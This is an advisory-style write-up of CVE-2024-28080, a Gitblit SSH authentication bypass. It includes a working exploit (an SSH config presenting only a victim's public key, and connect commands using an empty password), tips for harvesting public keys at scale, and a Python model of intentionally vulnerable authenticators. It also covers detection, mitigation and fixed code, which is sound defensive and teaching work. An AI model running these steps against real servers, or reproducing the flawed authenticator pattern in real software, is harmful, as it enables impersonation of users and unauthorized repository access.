Gitblit Embedded SSH Auth Bypass (CVE-2024-28080)

Overview

CVE-2024-28080 is an authentication bypass in Gitblit's embedded SSH service, caused by incorrect handling of session state in its integration with Apache MINA SSHD. If a user account has at least one SSH public key registered, an attacker who knows the victim's username and one of that user's public keys can authenticate without the private key and without the password.

  • Affected: Gitblit < 1.10.0 (observed on 1.9.3)
  • Fixed: 1.10.0
  • Prerequisites for exploitation:
    • Git over SSH enabled on the instance
    • The victim account has at least one SSH public key registered in Gitblit
    • The attacker knows the victim's username and one of their public keys (often publicly discoverable, e.g. https://github.com/.keys)

Root cause (state leaks between SSH methods)

In RFC 4252, public-key authentication is a two-stage process: the server first checks whether the offered public key is acceptable for the username, and only after a challenge/response carrying a signature does it actually authenticate the user. In MINA SSHD, the PublickeyAuthenticator is invoked twice: once at key acceptance (no signature yet) and again after the client returns a signature.

Gitblit's PublickeyAuthenticator mutated the session context on the first, pre-signature call: it bound an authenticated UserModel to the session and returned true ("key acceptable"). When authentication later fell back to password, the PasswordAuthenticator trusted that mutated session state and skipped its verification steps, returning true without validating the password. As a result, any password (including an empty one) was accepted once a public-key "acceptance" had occurred for that user.

The faulty flow at a high level:

  1. Client offers username + public key (no signature yet)
  2. Server recognizes the key as belonging to the user and prematurely stores the user in the session, returning true ("acceptable")
  3. Client cannot sign (no private key), so auth falls back to password
  4. Password auth sees the user already present in the session and unconditionally returns success

Step-by-step exploitation

  • Gather the victim's username and one of their public keys:
    • GitHub exposes public keys at https://github.com/.keys
    • Public servers often expose authorized_keys
  • Configure OpenSSH to present only the public half so that signature generation fails, forcing the fallback to password while still triggering the public-key acceptance path on the server.

Example SSH client config (no private key available):

```sshconfig
# ~/.ssh/config
Host gitblit-target
HostName <host-or-ip>
User <victim-username>
PubkeyAuthentication yes
PreferredAuthentications publickey,password
IdentitiesOnly yes
IdentityFile ~/.ssh/victim.pub   # public half only (no private key present)
```

Connect and press Enter at the password prompt (or type any string):

```bash
ssh gitblit-target
# or Git over SSH
GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git ls-remote ssh://<victim-username>@<host>/<repo.git>
```

Authentication succeeds because the earlier public-key phase mutated the session into an authenticated user, and password auth wrongly trusts that state.

Note: If ControlMaster multiplexing is enabled in your SSH config, subsequent Git commands may reuse the authenticated connection, increasing impact.

Impact

  • Full impersonation of any Gitblit user who has at least one registered SSH public key
  • Read/write access to repositories according to the victim's permissions (source exfiltration, unauthorized pushes, supply-chain risk)
  • Can affect administration if the target is an admin user
  • Pure network exploit; no brute force or private key required

Detection ideas

  • Review SSH logs for sequences in which a publickey attempt is followed by a successful password authentication with an empty or very short password
  • Look for the pattern: a publickey method offering unsupported/mismatched key material, followed by an immediate password success for the same username
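The correlation described in the two bullets above, as an added example (not Gitblit's code and not Gitblit's real log format): a small Python script that parses constructed auth-event lines in an assumed `<timestamp> <method> <result> user=<u> from=<ip>` layout and flags every password success that closely follows a non-successful publickey attempt from the same user and source. The window is tunable because, on a healthy server, the same sequence also occurs when a legitimate user whose key was rejected types their password; the value of the rule is in baselining how often that happens and alerting on spikes or on accounts that should never authenticate by password.

```python
import re
from datetime import datetime

# Constructed sample events (assumed layout, NOT Gitblit's actual log format).
SAMPLE_LOG = """\
2024-03-01T10:00:01Z publickey offered user=alice from=203.0.113.7
2024-03-01T10:00:01Z publickey failed user=alice from=203.0.113.7
2024-03-01T10:00:02Z password success user=alice from=203.0.113.7
2024-03-01T10:05:00Z publickey offered user=bob from=198.51.100.9
2024-03-01T10:05:01Z publickey success user=bob from=198.51.100.9
2024-03-01T11:00:00Z password success user=carol from=192.0.2.5
2024-03-01T11:30:00Z publickey failed user=dave from=192.0.2.8
2024-03-01T11:45:00Z password success user=dave from=192.0.2.8
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<method>publickey|password) "
    r"(?P<result>offered|failed|success) user=(?P<user>\S+) from=(?P<src>\S+)$"
)


def parse_events(lines):
    """Yield one dict per well-formed line; silently skip anything else."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield {
                "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                "method": m["method"],
                "result": m["result"],
                "user": m["user"],
                "src": m["src"],
            }


def find_fallback_successes(lines, window_seconds=30):
    """Return (user, src, publickey_ts, password_ts) for each password success
    that follows, within window_seconds, a publickey attempt that did NOT
    succeed for the same (user, source). Events must be in time order."""
    last_failed_pubkey = {}  # (user, src) -> timestamp of last non-successful publickey event
    hits = []
    for ev in parse_events(lines):
        key = (ev["user"], ev["src"])
        if ev["method"] == "publickey":
            if ev["result"] == "success":
                last_failed_pubkey.pop(key, None)  # a real key login clears the pending state
            else:
                last_failed_pubkey[key] = ev["ts"]
        elif ev["method"] == "password" and ev["result"] == "success":
            t = last_failed_pubkey.pop(key, None)
            if t is not None and (ev["ts"] - t).total_seconds() <= window_seconds:
                hits.append((ev["user"], ev["src"], t, ev["ts"]))
    return hits


def analyze_sample(window_seconds=30):
    """Run the rule over the constructed sample; widening the window also catches 'dave'."""
    return find_fallback_successes(SAMPLE_LOG.splitlines(), window_seconds)


if __name__ == "__main__":
    for user, src, t_pk, t_pw in analyze_sample():
        print(f"ALERT publickey->password fallback: user={user} from={src} "
              f"pubkey={t_pk.isoformat()} password={t_pw.isoformat()}")
```

With the default 30-second window only `alice` is reported; `bob` logged in with a real key, `carol` never offered a key, and `dave`'s password success comes 15 minutes after the failed key and is only reported when the window is widened.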

Mitigation

  • Upgrade to Gitblit v1.10.0+
  • Until upgraded:
    • Disable Git over SSH in Gitblit, or
    • Restrict network access to the SSH service, and
    • Monitor for the anomalous patterns described above
  • Rotate the credentials of affected users if compromise is suspected

Generalization: abusing SSH auth-method state leakage (MINA/OpenSSH-based services)

Pattern: if a server's public-key authenticator mutates user/session state during the pre-signature "key acceptable" phase, and other authenticators (e.g. password) trust that state, authentication can be bypassed by:

  • Presenting a valid public key of the target user (no private key)
  • Forcing the client to fail signing so the server falls back to password
  • Supplying any password while the password authenticator short-circuits on the leaked state

Practical notes:

  • Public key harvesting at scale: pull public keys from common sources such as https://github.com/.keys, organizational directories, team pages, leaked authorized_keys
  • Forcing signature failure (client-side): point IdentityFile at the .pub only, set IdentitiesOnly yes, and keep PreferredAuthentications listing publickey followed by password
  • MINA SSHD integration pitfalls:
    • PublickeyAuthenticator.authenticate(...) must not attach user/session state until the post-signature verification path has confirmed the signature
    • PasswordAuthenticator.authenticate(...) must not infer success from any state mutated during a previous, incomplete authentication method
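The faulty flow from the root-cause section and the two MINA SSHD pitfalls just listed, as one added model (not Gitblit's or Apache MINA SSHD's code): `Session`, `UserModel`, `USERS` and the four authenticator classes below are simplified Python stand-ins that reproduce the control flow, with the vulnerable pair beside a hardened pair. The vulnerable public-key authenticator binds the user to the session during the pre-signature acceptance check, and the vulnerable password authenticator treats that binding as proof; the hardened versions each answer only their own question and keep no cross-method state.

```python
import hashlib
import hmac
from dataclasses import dataclass, field


@dataclass
class Session:
    """Stand-in for a MINA ServerSession's attribute store (assumption, not the real API)."""
    attrs: dict = field(default_factory=dict)


@dataclass
class UserModel:
    username: str
    public_keys: set
    password_hash: bytes


def _toy_hash(password: str) -> bytes:
    # Unsalted SHA-256 keeps the model short; a real service would use a proper password hash.
    return hashlib.sha256(password.encode()).digest()


ALICE_KEY = "ssh-ed25519 AAAA...alice"  # constructed placeholder, not a real key
USERS = {"alice": UserModel("alice", {ALICE_KEY}, _toy_hash("correct horse"))}


class VulnerablePublickeyAuthenticator:
    def authenticate(self, username, key, session):
        user = USERS.get(username)
        if user and key in user.public_keys:
            session.attrs["user"] = user  # BUG: binds the user before any signature was verified
            return True
        return False


class VulnerablePasswordAuthenticator:
    def authenticate(self, username, password, session):
        if session.attrs.get("user") is not None:
            return True  # BUG: trusts state leaked from the incomplete publickey method
        user = USERS.get(username)
        return bool(user) and hmac.compare_digest(user.password_hash, _toy_hash(password))


class FixedPublickeyAuthenticator:
    """Stateless: answers only 'is this key acceptable for this user?'. Binding a
    user object to the session belongs in a hook that fires once the session is
    actually authenticated, never inside this callback."""
    def authenticate(self, username, key, session):
        user = USERS.get(username)
        return bool(user) and key in user.public_keys


class FixedPasswordAuthenticator:
    """Always verifies the password; never consults session state."""
    def authenticate(self, username, password, session):
        user = USERS.get(username)
        return bool(user) and hmac.compare_digest(user.password_hash, _toy_hash(password))


def run_bypass_attempt(pubkey_auth, pw_auth, username, public_key, password=""):
    """Drive the flow from the text: the key is offered without a signature, the
    client cannot sign, and the server falls back to password. Returns True if
    the server would consider the client authenticated."""
    session = Session()
    pubkey_auth.authenticate(username, public_key, session)  # stage 1: acceptance check only
    # Stage 2 (signature verification) never happens: there is no private key.
    return pw_auth.authenticate(username, password, session)


if __name__ == "__main__":
    vuln = run_bypass_attempt(VulnerablePublickeyAuthenticator(), VulnerablePasswordAuthenticator(), "alice", ALICE_KEY)
    fixed = run_bypass_attempt(FixedPublickeyAuthenticator(), FixedPasswordAuthenticator(), "alice", ALICE_KEY)
    print(f"empty password accepted: vulnerable={vuln} fixed={fixed}")
```

In a real MINA SSHD integration the equivalent of the deferred binding is to populate the session's user object only after the library reports the session as authenticated (for example from a SessionListener's Authenticated event), so that neither authenticator callback can leave partial state behind for the other to trust.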

Related protocol/design notes and literature:

  • SSH userauth protocol: RFC 4252 (publickey method is a two‑stage process)
  • Historical discussions on early acceptance oracles and auth races, e.g., CVE‑2016‑20012 disputes around OpenSSH behavior
